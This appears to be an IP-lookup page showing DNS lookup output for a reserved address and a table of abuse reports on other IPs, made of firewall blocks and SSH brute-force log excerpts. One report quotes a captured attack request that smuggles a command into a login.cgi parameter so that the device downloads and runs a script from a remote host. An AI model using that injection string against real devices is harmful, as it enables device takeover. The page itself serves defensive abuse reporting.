城市(city): unknown
省份(region): unknown
国家(country): IANA Special-Purpose Address
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 242.69.108.149
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 64258
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;242.69.108.149. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2025012200 1800 900 604800 86400
;; Query time: 53 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu Jan 23 01:40:10 CST 2025
;; MSG SIZE rcvd: 107Host 149.108.69.242.in-addr.arpa. not found: 3(NXDOMAIN)Server: 183.60.83.19
Address: 183.60.83.19#53
** server can't find 149.108.69.242.in-addr.arpa: NXDOMAIN| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 217.12.218.25 | attack | Aug 8 23:37:08 h2177944 kernel: \[3624050.565270\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=217.12.218.25 DST=85.214.117.9 LEN=60 TOS=0x10 PREC=0x40 TTL=56 ID=49596 DF PROTO=TCP SPT=40110 DPT=2222 WINDOW=29200 RES=0x00 SYN URGP=0 Aug 8 23:37:09 h2177944 kernel: \[3624051.566073\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=217.12.218.25 DST=85.214.117.9 LEN=60 TOS=0x10 PREC=0x40 TTL=56 ID=49597 DF PROTO=TCP SPT=40110 DPT=2222 WINDOW=29200 RES=0x00 SYN URGP=0 Aug 8 23:37:11 h2177944 kernel: \[3624053.569755\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=217.12.218.25 DST=85.214.117.9 LEN=60 TOS=0x10 PREC=0x40 TTL=56 ID=49598 DF PROTO=TCP SPT=40110 DPT=2222 WINDOW=29200 RES=0x00 SYN URGP=0 Aug 8 23:41:37 h2177944 kernel: \[3624319.520487\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=217.12.218.25 DST=85.214.117.9 LEN=60 TOS=0x10 PREC=0x40 TTL=56 ID=35392 DF PROTO=TCP SPT=52010 DPT=2223 WINDOW=29200 RES=0x00 SYN URGP=0 Aug 8 23:41:38 h2177944 kernel: \[3624320.520982\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=217.12.218.25 DST= |
2019-08-09 14:20:51 |
| 218.92.0.171 | attack | $f2bV_matches |
2019-08-09 14:06:17 |
| 59.48.153.231 | attackbotsspam | frenzy |
2019-08-09 14:11:24 |
| 138.197.88.135 | attackbotsspam | Aug 9 05:12:52 ip-172-31-62-245 sshd\[25847\]: Invalid user jarel from 138.197.88.135\ Aug 9 05:12:54 ip-172-31-62-245 sshd\[25847\]: Failed password for invalid user jarel from 138.197.88.135 port 49580 ssh2\ Aug 9 05:17:08 ip-172-31-62-245 sshd\[25863\]: Invalid user Jordan from 138.197.88.135\ Aug 9 05:17:10 ip-172-31-62-245 sshd\[25863\]: Failed password for invalid user Jordan from 138.197.88.135 port 41100 ssh2\ Aug 9 05:21:25 ip-172-31-62-245 sshd\[25880\]: Invalid user cloud from 138.197.88.135\ |
2019-08-09 14:24:02 |
| 86.49.81.10 | attack | 1 attack on wget probes like: 86.49.81.10 - - [08/Aug/2019:04:01:36 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://158.255.5.216/bin%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 11 |
2019-08-09 14:14:34 |
| 201.95.161.16 | attackbotsspam | Aug 9 07:31:55 vibhu-HP-Z238-Microtower-Workstation sshd\[29362\]: Invalid user taufiq from 201.95.161.16 Aug 9 07:31:55 vibhu-HP-Z238-Microtower-Workstation sshd\[29362\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=201.95.161.16 Aug 9 07:31:58 vibhu-HP-Z238-Microtower-Workstation sshd\[29362\]: Failed password for invalid user taufiq from 201.95.161.16 port 49556 ssh2 Aug 9 07:37:29 vibhu-HP-Z238-Microtower-Workstation sshd\[30276\]: Invalid user www from 201.95.161.16 Aug 9 07:37:29 vibhu-HP-Z238-Microtower-Workstation sshd\[30276\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=201.95.161.16 ... |
2019-08-09 14:00:51 |
| 122.226.181.166 | attack | fire |
2019-08-09 14:14:58 |
| 177.244.42.36 | attackbots | Aug 9 07:26:44 mail sshd\[18597\]: Failed password for invalid user hl from 177.244.42.36 port 51458 ssh2 Aug 9 07:42:27 mail sshd\[18809\]: Invalid user ventas from 177.244.42.36 port 56638 Aug 9 07:42:27 mail sshd\[18809\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=177.244.42.36 ... |
2019-08-09 14:51:21 |
| 185.173.35.21 | attackbots | 3389BruteforceFW23 |
2019-08-09 14:44:00 |
| 78.245.118.141 | attackspambots | Aug 9 03:58:02 icinga sshd[24722]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=78.245.118.141 Aug 9 03:58:04 icinga sshd[24722]: Failed password for invalid user prueba01 from 78.245.118.141 port 55544 ssh2 ... |
2019-08-09 14:40:22 |
| 128.199.199.251 | attackbotsspam | fire |
2019-08-09 14:05:28 |
| 122.226.181.165 | attackbotsspam | fire |
2019-08-09 14:22:07 |
| 37.49.227.92 | attackbotsspam | $f2bV_matches |
2019-08-09 14:01:17 |
| 177.38.178.25 | attackspam | Aug 8 04:08:45 wp sshd[471]: Did not receive identification string from 177.38.178.25 Aug 8 04:10:41 wp sshd[486]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=177-38-178-25.micks.com.br user=r.r Aug 8 04:10:43 wp sshd[486]: Failed password for r.r from 177.38.178.25 port 54366 ssh2 Aug 8 04:10:43 wp sshd[486]: Received disconnect from 177.38.178.25: 11: Normal Shutdown, Thank you for playing [preauth] Aug 8 04:11:49 wp sshd[488]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=177-38-178-25.micks.com.br user=r.r Aug 8 04:11:50 wp sshd[488]: Failed password for r.r from 177.38.178.25 port 40478 ssh2 Aug 8 04:11:51 wp sshd[488]: Received disconnect from 177.38.178.25: 11: Normal Shutdown, Thank you for playing [preauth] Aug 8 04:12:55 wp sshd[492]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=177-38-178-25.micks.com.br user=r.r Aug 8 0........ ------------------------------- |
2019-08-09 13:57:57 |
| 185.176.27.170 | attackbotsspam | Aug 9 05:51:59 TCP Attack: SRC=185.176.27.170 DST=[Masked] LEN=40 TOS=0x08 PREC=0x20 TTL=244 PROTO=TCP SPT=44749 DPT=26326 WINDOW=1024 RES=0x00 SYN URGP=0 |
2019-08-09 14:48:11 |